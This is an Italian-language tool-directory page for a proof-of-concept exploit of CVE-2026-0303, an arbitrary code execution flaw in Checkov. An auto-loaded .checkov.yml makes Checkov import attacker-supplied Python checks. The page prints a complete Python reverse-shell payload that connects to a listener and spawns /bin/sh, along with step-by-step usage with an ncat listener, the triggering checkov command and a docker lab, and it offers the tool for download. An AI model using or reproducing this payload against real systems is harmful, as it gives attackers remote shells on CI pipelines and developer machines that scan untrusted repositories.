Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-0303 — Checkov PoC: esecuzione arbitraria di codice tramite configurazione caricata automaticamente e controlli Python esterni non firmati. | Kitploit
Strumenti/GitHubGitHub/yonliud/cve-2026-0303
Analisi StaticaAnalisi delle VulnerabilitàAnalisi del CodiceExploitDevSecOpsSicurezza della Supply ChainApprendimento e FormazioneLab e Pratica
GitHubyonliud/cve-2026-0303

CVE-2026-0303

Checkov PoC: esecuzione arbitraria di codice tramite configurazione caricata automaticamente e controlli Python esterni non firmati.

Vedi Repository
8h 14m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Checkov Arbitrary Code Execution (CVE-2026-0303)

CVE: CVE-2026-0303 | CVSS Base: 6.3 | Severity: Low

CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:H/SI:H/SA:H

CVE-2026-0303 - Vulnerabilità di esecuzione di codice arbitrario in Checkov.
Pubblicata da Palo Alto Networks il 9 settembre 2026.

Versioni interessate: Checkov dalla 3.2.0 alla 3.2.531
Versione corretta: Checkov 3.2.532

TLDR

Esecuzione di codice arbitrario in Checkov tramite un file .checkov.yml caricato automaticamente -> esecuzione di codice Python controllato dall'attaccante tramite un controllo esterno personalizzato non firmato.

Demo

https://github.com/user-attachments/assets/62af16bb-5b7f-4465-98b9-2d1836f5ee4f

La Vulnerabilità

Checkov supporta controlli Python esterni. Questi controlli vengono intenzionalmente caricati come moduli Python, il che significa che le istruzioni Python di livello superiore vengono eseguite durante l'importazione del modulo.

Quando Checkov analizza una directory, cerca automaticamente in quella directory un file di configurazione .checkov.yml o .checkov.yaml; un file di configurazione controllato dall'attaccante potrebbe impostare external-checks-dir su una directory all'interno del repository analizzato.

Questo crea la seguente catena di esecuzione:

root@kitploit:~
La vittima analizza un repository non attendibile
        ->
Checkov carica automaticamente .checkov.yml
        ->
La configurazione imposta external-checks-dir
        ->
Checkov importa un modulo Python controllato dall'attaccante
        ->
Il codice Python di livello superiore viene eseguito con i privilegi di Checkov

L'attaccante non ha bisogno di sfruttare il parser Terraform o di fornire una policy Checkov valida. L'esecuzione del codice avviene quando Checkov importa il file Python.

Questo è particolarmente rilevante per le pipeline CI che eseguono automaticamente Checkov su pull request o altri contenuti di repository non attendibili.

Payload

Il payload del lab si connette dal container Checkov a un listener sull'host:

root@kitploit:~
def exploit():
    lhost = "host.docker.internal"
    lport = 4545
    sock = socket.create_connection((lhost, lport))
    for file_descriptor in (0, 1, 2):
        os.dup2(sock.fileno(), file_descriptor)
    subprocess.call(["/bin/sh", "-i"])


exploit()

Utilizzo

Modificare il payload in exploit\external-checks\poc_check.py:

root@kitploit:~
lhost = "127.0.0.1"
lport = 4444

Avviare un listener sull'host:

root@kitploit:~
ncat -lvkp 4444

Attivare il comportamento vulnerabile analizzando la directory controllata dall'attaccante:

root@kitploit:~
checkov -d /workspace --framework terraform --skip-download

Checkov legge automaticamente /workspace/.checkov.yml, individua la directory dei controlli esterni e importa poc_check.py. Il listener dovrebbe ricevere la shell quando viene eseguita la chiamata exploit() a livello di modulo.

Lab

Ho fornito un semplice lab docker che puoi configurare tramite

root@kitploit:~
docker compose up -d

e connetterti alla sua shell tramite

root@kitploit:~
docker exec -it scan-server /bin/sh

Disclaimer

Questo repository contiene una proof of concept indipendente per CVE-2026-0303. La vulnerabilità è stata ricreata e testata in un ambiente di laboratorio isolato.

Questo progetto è destinato esclusivamente a ricerca sulla sicurezza autorizzata, formazione e test in ambienti isolati. Non utilizzarlo contro sistemi, reti, repository o dati senza esplicita autorizzazione da parte del proprietario.

L'autore fornisce questo progetto così com'è, senza garanzie di alcun tipo, e non si assume alcuna responsabilità per danni, perdita di dati, interruzione del servizio, accesso non autorizzato o uso improprio di questo software o dei suoi derivati.

Scarica lo strumento